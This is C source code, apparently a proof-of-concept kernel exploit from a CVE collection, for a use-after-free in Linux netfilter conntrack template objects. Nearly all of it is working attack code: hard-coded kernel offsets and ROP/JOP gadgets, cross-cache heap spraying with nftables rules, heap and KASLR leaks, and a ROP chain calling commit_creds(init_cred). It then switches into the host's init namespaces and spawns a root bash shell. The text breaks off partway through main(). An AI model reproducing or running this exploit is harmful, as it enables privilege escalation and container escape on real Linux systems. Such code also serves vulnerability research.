/*
 * Page residue captured together with this file (not part of the program):
 *   4837 Total CVEs / 26 Years / GitHub / README.md / Rendering markdown...
 *   POC / exploit.c C
 */
#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/netfilter_ipv4.h>
#include <net/if.h>
#include <netinet/in.h>
#include <sched.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>

#include "./helpers.h"
#include "./helpers_nfqueue.h"

#define NFT_NOTRACK_OPS 0x1d430a0
#define INIT_NSPROXY 0x2876900
#define COMMIT_CREDS 0x01d4400
#define FIND_TASK_BY_VPID 0x01cab70
#define SWITCH_TASK_NAMESPACES 0x01d2880
#define KPTI_TRAMPOLINE 0x01401190 + 54 // swapgs_restore_regs_and_return_to_usermode + offset
#define INIT_CRED 0x2876b40

#define PUSH_RSI_XCHG_JMP_QWORD_PTR_RSI_F 0x0a5b286   // push rsi ; xchg bx, ax ; jmp QWORD PTR [rsi+0xf]
#define POP_RSP_R13_R14_R15_RET 0x01f1afb             // pop rsp ; pop r13 ; pop r14 ; pop r15 ; jmp 0xffffffff8125d450 (smp_call_function_single_async) -> ret
#define POP_RDI_RET 0x00dd45d                         // pop rdi ; ret
#define POP_RSI_RET 0x026d67e                         // pop rsi ; ret
#define POP_RDX_RET 0x0228ce2                         // pop rdx ; ret
#define MOV_RDI_RAX_MOV_RAX_RDI_POP_RBX_RET 0x0e4620d // mov rdi, rax ; mov rax, rdi ; pop rbx ; jmp 0xffffffff82605040 (__x86_return_thunk) -> ret

#define UDP_PORT 56789
#define QUEUE_NUM 2

// This enum is used by queue points to determine which packet should be queued.
enum signal_for_queue {
    SIGNAL_SPRAY,               // queue spray packet
    SIGNAL_PERCPU_TMPL_NF_CONN, // queue percpu nf_conn packet
    SIGNAL_TMP_TMPL_NF_CONN     // queue temporary template nf_conn packet
};

#define UDP_HEADER_SIZE 8
#define SLAB_CHUNK_SIZE_256 256
#define IPS_CONFIRMED_BIT 3

// CROSS CACHE PARAMS
#define OBJ_PER_SLAB_256 16
#define CPU_PARTIALS_SLABS_256 7
#define MIN_PARTIAL_256 5

#define CROSS_CACHE_DEFRAGMENTATION_SIZE 200
#define CROSS_CACHE_PRE_PRE_SIZE (OBJ_PER_SLAB_256 * (1 + MIN_PARTIAL_256))
#define CROSS_CACHE_PRE_SIZE (OBJ_PER_SLAB_256)
#define CROSS_CACHE_POST_SIZE (OBJ_PER_SLAB_256 - 1)
#define CROSS_CACHE_POST_POST_SIZE (OBJ_PER_SLAB_256 * (1 + CPU_PARTIALS_SLABS_256))

int spray_cross_cache_defragment[CROSS_CACHE_DEFRAGMENTATION_SIZE];
int spray_cross_cache_pre_pre[CROSS_CACHE_PRE_PRE_SIZE];
int spray_cross_cache_pre[CROSS_CACHE_PRE_SIZE];
int spray_cross_cache_post[CROSS_CACHE_POST_SIZE];
int spray_cross_cache_post_post[CROSS_CACHE_POST_POST_SIZE];

// SPRAY PARAMS
#define SPRAY_BATCHES 32
#define SPRAY_NOT_STRESS_BATCHES 4 // use this instead of SPRAY_BATCHES when the cache has only a few freed chunks
#define SPRAY_BATCH_SIZE 32

// SIZE AND OFFSETS
#define NFT_RULE_SIZE 0x18
#define NFT_EXPR_SIZE 0x8
#define NFT_LOG_SIZE 0x18

#define NFT_USERDATA_OFFS_DATA sizeof(struct nft_userdata)
#define NF_CONN_OFFS_CT_GENERAL 0x0
#define NF_CONN_OFFS_CT_STATUS 0x80
#define NF_CONN_OFFS_CT_NET 0x88
#define NF_CONN_OFFS_NAT_BYSOURCE 0x90
#define NF_CONN_OFFS_EXT 0xb0

#define NET_OFFS_CT 0x9c0
#define NETNS_CT_OFFS_NF_CONNTRACK_EVENT_CB 0x10

#define NFT_EXPR_OPS_OFFS_DEACTIVATE 0x28

// nf_ct_ext
#define NF_CT_EXT_NUM 9
#define NF_CT_EXT_LABELS 7

struct nf_ct_ext {
    uint8_t offset[NF_CT_EXT_NUM];
    uint8_t len;
    unsigned int gen_id;
    char data[];
};

#define BATCH_BUFFER_SIZE 1048576                                        // 1M buffer should be enough
#define NUMBER_OF_NOTRACK_EXPRS 13                                       // Use 13 notrack expressions as padding to align nft_log.prefix with the UAF write offset.
#define FAKE_EXT_OFFSET (SLAB_CHUNK_SIZE_256 - sizeof(struct nf_ct_ext)) // offset of the fake nf_ct_ext inside chunk 256, place fake ext at the bottom of chunk 256, right before adj nft_rule
#define JOP_OFFSET_FROM_BEGINNING_OF_NFT_RULE 0xc8                       // offset 0xc8 of nft_rule <=> expr->ops->deactivate

sock nlsock;
const uint16_t family = NFPROTO_IPV4;

uint64_t user_cs, user_ss, user_rflags, user_sp;
uint64_t leaked_first_tmpl_nf_conn_addr = 0, vmlinux = 0;

char buf[0xffff]; // general purpose buf

// id of the packet in netfilter queue
uint32_t packet_id_first_nf_conn;
uint32_t packet_id_second_nf_conn;
// handle of the nft_rule that reuses the memory left dangling in the nf_nat_bysource list (originally owned by the first nf_conn)
uint64_t rule_handle_first_nf_conn;

const char base_table[] = "base_table";
const char table_spray_name[] = "table_spray_name";
const char chain_spray_name[] = "chain_spray_name";

void save_state() {
    __asm__(".intel_syntax noprefix;"
            "mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            ".att_syntax;");
}

void after_privesc_as_root() {
    INFO("Returned to userland");

    setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
    setns(open("/proc/1/ns/pid", O_RDONLY), 0);
    setns(open("/proc/1/ns/net", O_RDONLY), 0);

    char *args[] = {"/bin/bash", "-i", NULL};
    execve(args[0], args, NULL);
}

/*
 * Write a printf-style formatted string to the file `which`, truncating it first.
 *
 * which:  path of the file to open in "w" mode.
 * format: printf-style format string, followed by its arguments.
 *
 * Any failure (open, format/write, or flush on close) is reported through
 * ERROR() and terminates the process with exit status 1.
 */
void write_to_file(const char *which, const char *format, ...) {
    FILE *fu = fopen(which, "w");
    if (fu == NULL) {
        // Without this check a failed open would hand NULL to vfprintf().
        ERROR("cannot open");
        exit(1);
    }

    va_list args;
    va_start(args, format);
    int written = vfprintf(fu, format, args);
    va_end(args); // every va_start() must be paired with va_end()

    // The stream is buffered, so a write the target rejects may only be
    // reported when fclose() flushes it; check both results.
    int closed = fclose(fu);
    if (written < 0 || closed != 0) {
        ERROR("cannot write");
        exit(1);
    }
}

int loopback_up() {
    struct ifreq ifr;
    int sockfd;

    // Create a socket to perform ioctl operations
    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd < 0) {
        perror("Socket creation failed");
        return 1;
    }

    // Specify the interface name ("lo" for loopback)
    strncpy(ifr.ifr_name, "lo", IFNAMSIZ);

    // Get the current flags for the interface
    if (ioctl(sockfd, SIOCGIFFLAGS, &ifr) < 0) {
        perror("Failed to get interface flags");
        close(sockfd);
        return 1;
    }

    // Set the IFF_UP flag to bring the interface up
    ifr.ifr_flags |= IFF_UP;

    // Apply the new flags to the interface
    if (ioctl(sockfd, SIOCSIFFLAGS, &ifr) < 0) {
        perror("Failed to set interface flags");
        close(sockfd);
        return 1;
    }

    INFO("Loopback interface 'lo' is now up.");
    close(sockfd);
    return 0;
}

int setup(void) {
    uid_t uid = getuid();
    gid_t gid = getgid();

    // In order to use nf_tables, we need CAP_NET_ADMIN
    INFO("Setting up user namespace");
    if (unshare(CLONE_NEWUSER | CLONE_NEWNET)) {
        ERROR("unshare(CLONE_NEWUSER | CLONE_NEWNET)");
        return -1;
    }

    INFO("Pinning process to CPU #0");
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(0, &set);
    if (sched_setaffinity(getpid(), sizeof(set), &set) < 0) {
        ERROR("sched_setaffinity");
        return -1;
    }

    // now we map uid and gid
    write_to_file("/proc/self/uid_map", "0 %d 1", uid);
    // deny setgroups (see user_namespaces(7))
    write_to_file("/proc/self/setgroups", "deny");
    // remap gid
    write_to_file("/proc/self/gid_map", "0 %d 1", gid);

    loopback_up();

    return 0;
}

int setup_nft_base_table() {
    table t = make_table(base_table, family, NULL, 0);
    batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);
    batch_new_table(b, t, family);
    return batch_send_and_run_callbacks(b, nlsock, NULL);
}

int vuln_setup() {
    char c_pre_conntrack_name[] = "pre_conntrack_chain";
    char c_post_conntrack_name[] = "post_conntrack_chain";

    chain c_pre_conntrack = make_chain(base_table, c_pre_conntrack_name, 0, NF_INET_LOCAL_OUT, NF_IP_PRI_CONNTRACK - 1, NULL);
    expr e_notrack = make_notrack_expr();
    rule r_pre_conntrack = make_rule(base_table, c_pre_conntrack_name, &e_notrack, 1, NULL, 0, 0);

    chain c_post_conntrack = make_chain(base_table, c_post_conntrack_name, 0, NF_INET_LOCAL_OUT, NF_IP_PRI_CONNTRACK + 1, NULL);
    expr e_ct_set_zone = make_ct_set_zone_expr(NFT_REG32_00);
    rule r_post_conntrack = make_rule(base_table, c_post_conntrack_name, &e_ct_set_zone, 1, NULL, 0, 0);

    batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);

    batch_new_chain(b, c_pre_conntrack, family);
    batch_new_chain(b, c_post_conntrack, family);
    batch_new_rule(b, r_pre_conntrack, family);
    batch_new_rule(b, r_post_conntrack, family);

    return batch_send_and_run_callbacks(b, nlsock, NULL);
}

int register_base_nat_chain() {
    // The hooknum can be any valid Netfilter hook
    chain c_nat = make_chain(base_table, "nat_chain", 0, NF_INET_POST_ROUTING, 0, "nat");

    batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);
    batch_new_chain(b, c_nat, family);

    return batch_send_and_run_callbacks(b, nlsock, NULL);
}

// Register a chain with a rule that queues packets based on the first byte of their payload
int register_conditional_queue_point(char *chain_name, uint32_t hooknum, uint32_t prio, uint8_t byte_to_compare) {
    chain c = make_chain(base_table, chain_name, 0, hooknum, prio, NULL);

    expr e_payload = make_payload_expr(NFT_PAYLOAD_TRANSPORT_HEADER, UDP_HEADER_SIZE, 1, NFT_REG32_00);
    expr e_cmp = make_cmp_expr(NFT_REG32_00, NFT_CMP_EQ, byte_to_compare);
    expr e_queue = make_queue_expr(QUEUE_NUM, 0, 0);

    expr list_e[3] = {e_payload, e_cmp, e_queue};
    rule r = make_rule(base_table, chain_name, list_e, ARRAY_SIZE(list_e), NULL, 0, 0);

    batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);
    batch_new_chain(b, c, family);
    batch_new_rule(b, r, family);

    return batch_send_and_run_callbacks(b, nlsock, NULL);
}

void update_labels_to_overwrites_ops() {
    char buf[MNL_SOCKET_BUFFER_SIZE];
    struct nlmsghdr *nlh;
    struct nlattr *nest;

    // Release the packet from the "nf_conn_queue_point_2" queue point.
    nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, QUEUE_NUM);
    nfq_nlmsg_verdict_put(nlh, packet_id_second_nf_conn, NF_ACCEPT);

    uint64_t adj_nft_rule_addr = leaked_first_tmpl_nf_conn_addr + SLAB_CHUNK_SIZE_256;

    uint64_t fake_ops_addr = adj_nft_rule_addr + JOP_OFFSET_FROM_BEGINNING_OF_NFT_RULE - NFT_EXPR_OPS_OFFS_DEACTIVATE;
    uint64_t orig_ops_addr = vmlinux + NFT_NOTRACK_OPS;

    uint8_t cta_labels[16] = {0};
    uint8_t cta_masks[16] = {0};

    *(uint64_t *)&cta_labels[0x0] = fake_ops_addr ^ orig_ops_addr;

    nest = mnl_attr_nest_start(nlh, NFQA_CT);
    mnl_attr_put(nlh, CTA_LABELS, 16, cta_labels);
    mnl_attr_put(nlh, CTA_LABELS_MASK, 16, cta_masks);
    mnl_attr_nest_end(nlh, nest);

    if (mnl_socket_sendto(nlsock_queue, nlh, nlh->nlmsg_len) < 0) {
        perror("mnl_socket_send");
        exit(EXIT_FAILURE);
    }

    // This packet will be stopped at "nf_conn_queue_point_3". Keep it alive to avoid potential errors from it being freed.
}

/*
 * Send a single UDP datagram to 127.0.0.1:UDP_PORT whose one-byte payload
 * is `first_byte`.
 *
 * first_byte: the only payload byte of the datagram.
 *
 * Failures to create the socket or to send are reported with perror();
 * the function returns normally in either case.
 */
void send_udp_packet(uint8_t first_byte) {
    int sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if (sock < 0) {
        perror("socket");
        return;
    }

    // Designated initializer zero-fills the fields not named here (e.g. sin_zero).
    struct sockaddr_in addr = {
        .sin_family = AF_INET,
        .sin_port = htons(UDP_PORT),
        .sin_addr.s_addr = inet_addr("127.0.0.1"),
    };

    if (sendto(sock, &first_byte, 1, 0, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        perror("sendto");
    }
    close(sock);
}

int setup_chain_to_spray_nft_rule() {
    table t_spray = make_table(table_spray_name, family, NULL, 0);
    chain c_spray = make_chain(table_spray_name, chain_spray_name, 0, -1, 0, NULL);

    batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);

    batch_new_table(b, t_spray, family);
    batch_new_chain(b, c_spray, family);

    return batch_send_and_run_callbacks(b, nlsock, NULL);
}

int alloc_nf_conn() {
    // send a packet to alloc a temporary template nf_conn in the function `nft_ct_set_zone_eval()`
    // this template nf_conn stays alive until the user sends a DROP verdict to drop the packet
    send_udp_packet(SIGNAL_SPRAY);

    int id_in_queue = queue_recv(queue_get_id_cb); // recv the packet at "before_nat_chain" queue point
    return id_in_queue;
}

#define FIRST_SPRAY_MIN_RULE_HANDLE 2 // handle for rule used to spray start from 2
#define FIRST_SPRAY_MAX_RULE_HANDLE (SPRAY_BATCHES * SPRAY_BATCH_SIZE + FIRST_SPRAY_MIN_RULE_HANDLE - 1)

int dump_exprs(const struct nlmsghdr *nlh, void *data) {
    rule r = nftnl_rule_alloc();
    nftnl_rule_nlmsg_parse(nlh, r);

    struct nftnl_expr_iter *iter = nftnl_expr_iter_create(r);

    // Skip notrack exprs
    for (int i = 0; i < NUMBER_OF_NOTRACK_EXPRS; i++)
        nftnl_expr_iter_next(iter);

    // Retrieve the content of the prefix field
    const char *leaked = nftnl_expr_get_str(nftnl_expr_iter_next(iter), NFTNL_EXPR_LOG_PREFIX);

    if (leaked) {
        leaked_first_tmpl_nf_conn_addr = (*(uint64_t *)leaked) - NF_CONN_OFFS_NAT_BYSOURCE;
        INFO("Heap address of the first tmpl nf_conn addr: 0x%lx", leaked_first_tmpl_nf_conn_addr);
    }

    nftnl_expr_iter_destroy(iter);
    nftnl_rule_free(r);

    return MNL_CB_OK;
}

int leak_heap_first_tmpl_nf_conn() {
    char buf[MNL_SOCKET_BUFFER_SIZE];
    rule r;
    nlmsghdr hdr;

    // One of these rules contains the overwritten prefix. By dumping the prefix field, we leak the heap address of the chunk used by the first template nf_conn.
    for (uint64_t handle = FIRST_SPRAY_MIN_RULE_HANDLE; handle <= FIRST_SPRAY_MAX_RULE_HANDLE; handle++) {
        r = make_rule(table_spray_name, chain_spray_name, NULL, 0, NULL, 0, handle);
        rseq = seq;
        hdr = dump_rule(r, buf, family);
        nftnl_rule_free(r);

        if (mnl_socket_sendto(nlsock, buf, hdr->nlmsg_len) < 0) {
            ERROR("mnl_socket_sendto");
            return -1;
        }
        if (run_callbacks(nlsock, dump_exprs, NULL) < 0) {
            ERROR("run_callbacks leak_heap: primitive");
            return -1;
        }

        if (leaked_first_tmpl_nf_conn_addr) {
            rule_handle_first_nf_conn = handle; // Save the handle of the rule that reclaimed the freed chunk.
            return 0;
        }
    }
    return -1;
}

int queue_leak_kaslr_cb(const struct nlmsghdr *nlh, void *data) {
    struct nfqnl_msg_packet_hdr *ph = NULL;
    char *ct_ext;
    struct nlattr *attr[NFQA_MAX + 1] = {};

    if (nfq_nlmsg_parse(nlh, attr) < 0) {
        perror("problems parsing");
        return MNL_CB_ERROR;
    }

    ph = mnl_attr_get_payload(attr[NFQA_PACKET_HDR]);
    ct_ext = mnl_attr_get_payload(attr[NFQA_CT]);

    packet_id_second_nf_conn = ntohl(ph->packet_id);

    // 0x4c is the offset of the labels data inside the received payload.
    // Use a hard-coded offset to quickly retrieve the value.
    vmlinux = *(uint64_t *)&ct_ext[0x4c] - NFT_NOTRACK_OPS;
    INFO("Leaked vmlinux: 0x%lx", vmlinux);

    return MNL_CB_OK;
}

int leak_kaslr() {
    // The second template nf_conn is now completely under attacker control.
    // Release the packet from the "nf_conn_queue_point_1" queue point.
    nfq_send_verdict(QUEUE_NUM, packet_id_second_nf_conn, NF_ACCEPT);

    INFO("Try to recv, if exploit gets stuck here, the cross-cache likely didn't hit and the packet was dropped");
    queue_recv(queue_leak_kaslr_cb); // recv the packet from "nf_conn_queue_point_2" queue point

    return 0;
}

int spray_nft_tables_udata_kmalloc_cg_256_fake_ext() {
    int table_spray_counter = 0;

    char udata[SLAB_CHUNK_SIZE_256] = {0};
    struct nf_ct_ext *fake_nf_ct_ext = (struct nf_ct_ext *)&udata[FAKE_EXT_OFFSET];
    fake_nf_ct_ext->offset[NF_CT_EXT_LABELS] = sizeof(struct nf_ct_ext) + NFT_RULE_SIZE; // => labels's offset points to notrack ops inside adjacent nft_rule
    fake_nf_ct_ext->len = 0;
    fake_nf_ct_ext->gen_id = 0;

    for (int i = 0; i < SPRAY_NOT_STRESS_BATCHES; ++i) {
        batch b = batch_init(BATCH_BUFFER_SIZE);
        for (int j = 0; j < SPRAY_BATCH_SIZE; ++j) {
            char table_name[32];
            sprintf(table_name, "tsrp-1-%d", table_spray_counter++);
            table t = make_table(table_name, family, udata, sizeof(udata));
            batch_new_table(b, t, family);
            nftnl_table_free(t);
        }
        if (batch_send_and_run_callbacks(b, nlsock, NULL) < 0)
            return -1;
    }

    return 0;
}

int del_target_rule(uint32_t handle) {
    rule r = make_rule(table_spray_name, chain_spray_name, NULL, 0, NULL, 0, handle);

    batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);

    batch_del_rule(b, r, family);

    return batch_send_and_run_callbacks(b, nlsock, NULL);
}

int update_adjacent_nft_rule_udata_with_ROP() {
    // The only way to update the udata of an nft_rule is to free the rule and spray again.

    // 1. Free adjacent nft_rule
    // Calculate the handle range for the adj nft_rules
    int32_t lower_bound_adj_rule_handle = rule_handle_first_nf_conn - (OBJ_PER_SLAB_256 - 1);
    lower_bound_adj_rule_handle = lower_bound_adj_rule_handle < FIRST_SPRAY_MIN_RULE_HANDLE ? FIRST_SPRAY_MIN_RULE_HANDLE : lower_bound_adj_rule_handle;
    int32_t upper_bound_adj_rule_handle = rule_handle_first_nf_conn + (OBJ_PER_SLAB_256 - 1);
    upper_bound_adj_rule_handle = upper_bound_adj_rule_handle > FIRST_SPRAY_MAX_RULE_HANDLE ? FIRST_SPRAY_MAX_RULE_HANDLE : upper_bound_adj_rule_handle;

    for (int32_t handle = lower_bound_adj_rule_handle; handle <= upper_bound_adj_rule_handle; handle++) {
        if (handle == rule_handle_first_nf_conn)
            continue;

        del_target_rule(handle);
    }

    // @sleep(kernel_func="nft_commit_release",
    //        desc="wait for adjacent nft_rule to be freed")
    usleep(100 * 1000);

    // 2. Spray nft_rules with udata containing the ROP chain.
    const size_t udata_len = SLAB_CHUNK_SIZE_256 - NFT_RULE_SIZE - NFT_EXPR_SIZE - sizeof(struct nft_userdata);
    char udata[udata_len];
    memset(udata, 0, udata_len);

    // the jop gadget jumps to [rsi + 0xf] so we put the stack pivot gadget there
    *(uint64_t *)&udata[0xf - NFT_EXPR_SIZE] = vmlinux + POP_RSP_R13_R14_R15_RET;

    uint64_t *rop = (uint64_t *)&udata[0x10];

    // commit_creds(&init_cred)
    *rop++ = vmlinux + POP_RDI_RET;
    *rop++ = vmlinux + INIT_CRED;
    *rop++ = vmlinux + COMMIT_CREDS;

    // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
    *rop++ = vmlinux + POP_RDI_RET;
    *rop++ = 1;
    *rop++ = vmlinux + FIND_TASK_BY_VPID;
    *rop++ = vmlinux + MOV_RDI_RAX_MOV_RAX_RDI_POP_RBX_RET;
    *rop++ = 0;
    *rop++ = vmlinux + POP_RSI_RET;
    *rop++ = vmlinux + INIT_NSPROXY;
    *rop++ = vmlinux + SWITCH_TASK_NAMESPACES;

    // return to userspace
    *rop++ = vmlinux + KPTI_TRAMPOLINE;
    rop++;
    rop++;

    *rop++ = (uint64_t)after_privesc_as_root;
    *rop++ = user_cs;
    *rop++ = user_rflags;
    *rop++ = user_sp;
    *rop++ = user_ss;

    // jop gadget, put here because this space is unused. rsi is pointing to fake_expr
    // we can use either of the following, they are equivalent
    *rop++ = vmlinux + PUSH_RSI_XCHG_JMP_QWORD_PTR_RSI_F;
    // or
    #define NFT_RULE_OFFS_NFT_USERDATA (NFT_RULE_SIZE + NFT_EXPR_SIZE)
    *(uint64_t *)&udata[JOP_OFFSET_FROM_BEGINNING_OF_NFT_RULE - NFT_RULE_OFFS_NFT_USERDATA] = vmlinux + PUSH_RSI_XCHG_JMP_QWORD_PTR_RSI_F;
    // It’s okay to comment out either one of the two.

    expr e_notrack = make_notrack_expr(); // The ops of this notrack expression will be overwritten later.

    // Because data in struct nft_userdata starts at offset 1, we send udata from offset 1 to keep everything aligned.
    rule r = make_rule(table_spray_name, chain_spray_name, &e_notrack, 1, &((struct nft_userdata *)&udata)->data, sizeof(udata) - NFT_USERDATA_OFFS_DATA, 0);

    for (int i = 0; i < SPRAY_NOT_STRESS_BATCHES; i++) {
        batch b = batch_init(BATCH_BUFFER_SIZE);
        for (int j = 0; j < SPRAY_BATCH_SIZE; j++) {
            batch_new_rule(b, r, family);
        }
        if (batch_send_and_run_callbacks(b, nlsock, NULL) < 0)
            return -1;
    }

    return 0;
}

int spray_nft_tables_udata_kmalloc_cg_256_fake_nf_conn() {
    int table_spray_counter = 0;
    char fake_nf_conn[256] = {0};

    *(uint32_t *)(&fake_nf_conn[NF_CONN_OFFS_CT_GENERAL]) = 1; // set refcnt = 1

    // set status = CONFIRMED to skip function `__nf_conntrack_update()` in `nf_conntrack_update()`. flow: nfqnl_recv_verdict()->nfqnl_reinject()->nf_conntrack_update()
    *(uint64_t *)(&fake_nf_conn[NF_CONN_OFFS_CT_STATUS]) = 1 << IPS_CONFIRMED_BIT;

    // prevents null deref at line `rcu_access_pointer(net->ct.nf_conntrack_event_cb)` in `nf_conntrack_event_cache()`
    // Just needs to be set to a valid memory address (e.g., leaked_first_tmpl_nf_conn_addr).
    *(uint64_t *)(&fake_nf_conn[NF_CONN_OFFS_CT_NET]) = leaked_first_tmpl_nf_conn_addr - (NET_OFFS_CT + NETNS_CT_OFFS_NF_CONNTRACK_EVENT_CB);

    // Set ext to point to the fake nf_ct_ext we placed at the bottom of the leaked address chunk.
    *(uint64_t *)(&fake_nf_conn[NF_CONN_OFFS_EXT]) = leaked_first_tmpl_nf_conn_addr + FAKE_EXT_OFFSET;

    for (int i = 0; i < SPRAY_BATCHES; ++i) {
        batch b = batch_init(BATCH_BUFFER_SIZE);
        for (int j = 0; j < SPRAY_BATCH_SIZE; ++j) {
            char table_name[32];
            sprintf(table_name, "tsrp-2-%d", table_spray_counter++);
            table t = make_table(table_name, family, fake_nf_conn, sizeof(fake_nf_conn));
            batch_new_table(b, t, family);
            nftnl_table_free(t);
        }
        if (batch_send_and_run_callbacks(b, nlsock, NULL) < 0)
            return -1;
    }

    return 0;
}

int escalate() {
    batch b;

    rule del_rule = make_rule(table_spray_name, chain_spray_name, NULL, 0, NULL, 0, 0);
    b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);
    batch_del_rule(b, del_rule, family);

    return batch_send_and_run_callbacks(b, nlsock, NULL);
}

void spray_cross_cache_pre_alloc() {
    // 1. DEFRAG kmalloc-256
    for (int i = 0; i < CROSS_CACHE_DEFRAGMENTATION_SIZE; i++) {
        spray_cross_cache_defragment[i] = alloc_nf_conn();
    }
    // 2. pre pre allocate
    for (int i = 0; i < CROSS_CACHE_PRE_PRE_SIZE; i++) {
        spray_cross_cache_pre_pre[i] = alloc_nf_conn();
    }
    // 3. pre allocate
    for (int i = 0; i < CROSS_CACHE_PRE_SIZE; i++) {
        spray_cross_cache_pre[i] = alloc_nf_conn();
    }
}

// alloc target between spray_cross_cache_pre_alloc() and spray_cross_cache_post_alloc()

void spray_cross_cache_post_alloc() {
    // 5. post allocate
    for (int i = 0; i < CROSS_CACHE_POST_SIZE; i++) {
        spray_cross_cache_post[i] = alloc_nf_conn();
    }

    // 6. post post allocate
    for (int i = 0; i < CROSS_CACHE_POST_POST_SIZE; i++) {
        spray_cross_cache_post_post[i] = alloc_nf_conn();
    }
}

void cross_cache_pre_free() {
    // 7. pre pre free
    for (int i = 0; i < CROSS_CACHE_PRE_PRE_SIZE; i++) {
        nfq_send_verdict(QUEUE_NUM, spray_cross_cache_pre_pre[i], NF_DROP);
    }

    // 8. pre free
    for (int i = 0; i < CROSS_CACHE_PRE_SIZE; i++) {
        nfq_send_verdict(QUEUE_NUM, spray_cross_cache_pre[i], NF_DROP);
    }
}

// free target between cross_cache_pre_free() and cross_cache_post_free()

void cross_cache_post_free() {
    // 9. post free
    for (int i = 0; i < CROSS_CACHE_POST_SIZE; i++) {
        nfq_send_verdict(QUEUE_NUM, spray_cross_cache_post[i], NF_DROP);
    }

    // 11. post post free
    for (int i = 0; i < CROSS_CACHE_POST_POST_SIZE; i++) {
        nfq_send_verdict(QUEUE_NUM, spray_cross_cache_post_post[i], NF_DROP);
    }
}

int spray_nft_rule_kmalloc_cg_256() {
    const int number_of_exprs = NUMBER_OF_NOTRACK_EXPRS + 1; // + 1 for nft_log expression
    int udata_size = SLAB_CHUNK_SIZE_256;                    // craft a rule in cache 256
    udata_size -= NFT_RULE_SIZE;
    udata_size -= NFT_EXPR_SIZE * number_of_exprs; // this rule contains NUMBER_OF_NOTRACK_EXPRS expressions, notrack expression doesn't have private data.
    udata_size -= NFT_LOG_SIZE;                    // nft_log expression has private data
    udata_size -= sizeof(struct nft_userdata);

    char udata[udata_size];
    memset(udata, 0, udata_size);

    expr list_e[number_of_exprs];

    // notrack exprs are used as padding for nft_log
    for (int i = 0; i < NUMBER_OF_NOTRACK_EXPRS; i++) {
        list_e[i] = make_notrack_expr();
    }

    expr e_log = make_log_expr(NULL);
    list_e[number_of_exprs - 1] = e_log; // nft_log.prefix field is located at offset 0x98 of nft_rule. It matches the offset of the uaf write.

    rule r = make_rule(table_spray_name, chain_spray_name, list_e, ARRAY_SIZE(list_e), udata, sizeof(udata), 0);

    for (int i = 0; i < SPRAY_BATCHES; i++) {
        batch b = batch_init(BATCH_BUFFER_SIZE);
        for (int j = 0; j < SPRAY_BATCH_SIZE; j++) {
            batch_new_rule(b, r, family);
        }
        if (batch_send_and_run_callbacks(b, nlsock, NULL) < 0)
            return -1;
    }

    return 0;
}

int setup_netfilter() {
    INFO("Creating netfilter netlink socket");
    if ((nlsock = mnl_socket_open(NETLINK_NETFILTER)) == NULL) {
        ERROR("mnl_socket_open(): nlsock");
        return -1;
    }
    if (mnl_socket_bind(nlsock, 0, MNL_SOCKET_AUTOPID) < 0) {
        ERROR("mnl_socket_bind");
        return -1;
    }

    setup_nf_queue();
    setup_nft_base_table();
    vuln_setup();

    // "before_nat_chain" queue point blocks spray packets entering base NAT chain while keeping them alive.
    register_conditional_queue_point("before_nat_chain", NF_INET_POST_ROUTING, NF_IP_PRI_NAT_SRC - 1, SIGNAL_SPRAY);
    register_base_nat_chain();
    // The "nf_conn_queue_point_*" queue point queues two sk_buffs with temporary template nf_conns used to interact with the vulnerability.
    register_conditional_queue_point("nf_conn_queue_point_1", NF_INET_POST_ROUTING, NF_IP_PRI_NAT_SRC + 1, SIGNAL_TMP_TMPL_NF_CONN);
    register_conditional_queue_point("nf_conn_queue_point_2", NF_INET_POST_ROUTING, NF_IP_PRI_NAT_SRC + 2, SIGNAL_TMP_TMPL_NF_CONN);
    register_conditional_queue_point("nf_conn_queue_point_3", NF_INET_POST_ROUTING, NF_IP_PRI_NAT_SRC + 3, SIGNAL_TMP_TMPL_NF_CONN);

    // "after_nf_confirm" queue point is used to keep the sk_buff with percpu template nf_conn of nft_ct_zone_eval() alive, allows us to use the temporary nf_conn of nft_ct_zone_eval().
    // Note: We can't queue a sk_buff containing an unconfirmed nf_conn with refcount greater than 1, read nf_ct_drop_unconfirmed().
    // Register this queue point after `nf_confirm()` function.
    register_conditional_queue_point("after_nf_confirm", NF_INET_PRE_ROUTING, NF_IP_PRI_FIRST, SIGNAL_PERCPU_TMPL_NF_CONN);

    setup_chain_to_spray_nft_rule();

    return 0;
}

int main() {
    save_state();

    if (setup() == -1)
        return -1;

    setup_netfilter();

    send_udp_packet(SIGNAL_PERCPU_TMPL_NF_CONN); // attach per-cpu template nf_conn to this packet
    queue_recv(NULL);                            // recv the packet from "after_nf_confirm" queue point. Keeping this packet alive keeps the per-CPU template busy, allowing us to use a temporary template nf_conn.

    INFO("I: CROSS CACHE: kmalloc-256 (struct nf_conn) -> kmalloc-cg-256 (struct nft_rule)");
    spray_cross_cache_pre_alloc();

    INFO("Allocate the first template nf_conn + link it to nf_nat_bysource");
    send_udp_packet(SIGNAL_TMP_TMPL_NF_CONN);              // attach temporary template nf_conn to this packet
    packet_id_first_nf_conn = queue_recv(queue_get_id_cb); // recv the packet from "nf_conn_queue_point_1" queue point

    spray_cross_cache_post_alloc();
    cross_cache_pre_free();

    INFO("Drop the packet with the first template nf_conn, leaving a dangling pointer in nf_nat_bysource hash table");
    nfq_send_verdict(QUEUE_NUM, packet_id_first_nf_conn, NF_DROP);

    cross_cache_post_free();

    INFO("Reclaim the first template nf_conn (kmalloc-256) with nft_rule (kmalloc-cg-256)");
    spray_nft_rule_kmalloc_cg_256();
    INFO("I: end CROSS CACHE");

